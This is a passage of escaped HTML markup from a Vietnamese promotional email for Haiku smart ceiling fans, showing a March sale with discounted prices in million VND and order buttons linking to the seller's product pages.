style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/du-an-tieu-bieu-haiku.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\">- D\\u1ef0 \\u00c1N L\\u1eaeP \\u0110\\u1eb6T -<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"408\\\" style=\\\"width: 408px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-68\\\" style=\\\"max-width: 320px;min-width: 408px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_deprecated_8\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px 40px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ced4d9; line-height: 160%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">V\\u1edbi kh\\u00f4ng gian Nh\\u00e0 \\u1ede n\\u01a1i c\\u00f3 con ng\\u01b0\\u1eddi sinh ho\\u1ea1t h\\u00e0ng n\\u00e0y. Qu\\u1ea1t tr\\u1ea7n nh\\u00e0 \\u1edf d\\u00e2n d\\u1ee5ng s\\u1ebd gi\\u00fap tho\\u1ea3i m\\u00e1i kh\\u00f4ng gian th\\u00f4ng tho\\u00e1ng c\\u1ea3 ng\\u00e0y. Th\\u00eam m\\u1ed9t c\\u1ea3m bi\\u1ebfn chuy\\u1ec3n \\u0111\\u1ed9ng t\\u00edch h\\u1ee3p s\\u1ebd b\\u1eadt\\/t\\u1eaft qu\\u1ea1t b\\u00e1n t\\u1ef1 \\u0111\\u1ed9ng, trong khi c\\u00e1c c\\u1ea3m bi\\u1ebfn m\\u00f4i tr\\u01b0\\u1eddng li\\u00ean t\\u1ee5c theo d\\u00f5i t\\u00ecnh tr\\u1ea1ng ph\\u00f2ng c\\u1ee7a b\\u1ea1n. Ch\\u1ec9 c\\u1ea7n \\u0111\\u1eb7t t\\u00f9y ch\\u1ecdn \\u0111\\u1ec3 t\\u1ef1 \\u0111\\u1ed9ng qu\\u1ea3n l\\u00fd lu\\u1ed3ng kh\\u00f4ng kh\\u00ed v\\u00e0 \\u00e1nh s\\u00e1ng LED c\\u1ea7n thi\\u1ebft \\u0111\\u1ec3 gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i b\\u1ea5t c\\u1ee9 l\\u00fac n\\u00e0o.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #f5f5f5\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #f5f5f5;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 0px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 18px; line-height: 25.2px;\\\"><strong><span style=\\\"line-height: 25.2px; font-size: 18px;\\\">SALE OFF<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #383a3c; line-height: 120%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><span style=\\\"font-size: 38px; line-height: 45.6px;\\\"><strong><span style=\\\"line-height: 45.6px; font-family: \'Open Sans\', sans-serif; font-size: 38px;\\\">CH\\u01af\\u01a0NG TR\\u00ccNH GI\\u1ea2M GI\\u00c1 T3<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 0px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 20px; line-height: 28px;\\\"><strong><span style=\\\"line-height: 28px; font-size: 20px;\\\"><span style=\\\"color: #db1908; line-height: 28px; font-size: 20px;\\\">GI\\u00c1 T\\u1ed0T NH\\u1ea4T<\\/span> T\\u1eea HAMILTON AIR<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #f5f5f5\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #f5f5f5;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"left\\\">\\r\\n      \\r\\n      <img align=\\\"left\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678763735498-L-caramel-wh.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_1\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>HAIKU L SERIES<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_13\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>CARAMEL WHITE 52\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_5\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">23.8 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">19.0 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_3\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-52inch-mau-caramel.html\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-52inch-mau-caramel.html\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678763684307-cocoa_bamboo.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_9\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>HAIKU H - SMART CEILING FANS<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_10\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>COCOA BAMBOO - 60\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_11\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">39.6 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup><span style=\\\"line-height: 12px;\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">32.6 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_2\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh-cao-cap-haiku-60inch-caramel-bamboo.html\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh-cao-cap-haiku-60inch-caramel-bamboo.html\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-width: 0px; border-top-style: solid; border-top-color: #CCC; border-left-width: 0px; border-left-style: solid; border-left-color: #CCC; border-right-width: 0px; border-right-style: solid; border-right-color: #CCC; border-bottom-width: 0px; border-bottom-style: solid; border-bottom-color: #CCC;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #f5f5f5\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #f5f5f5;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"left\\\">\\r\\n      \\r\\n      <img align=\\\"left\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678766160579-nexus-wh.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_9\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" 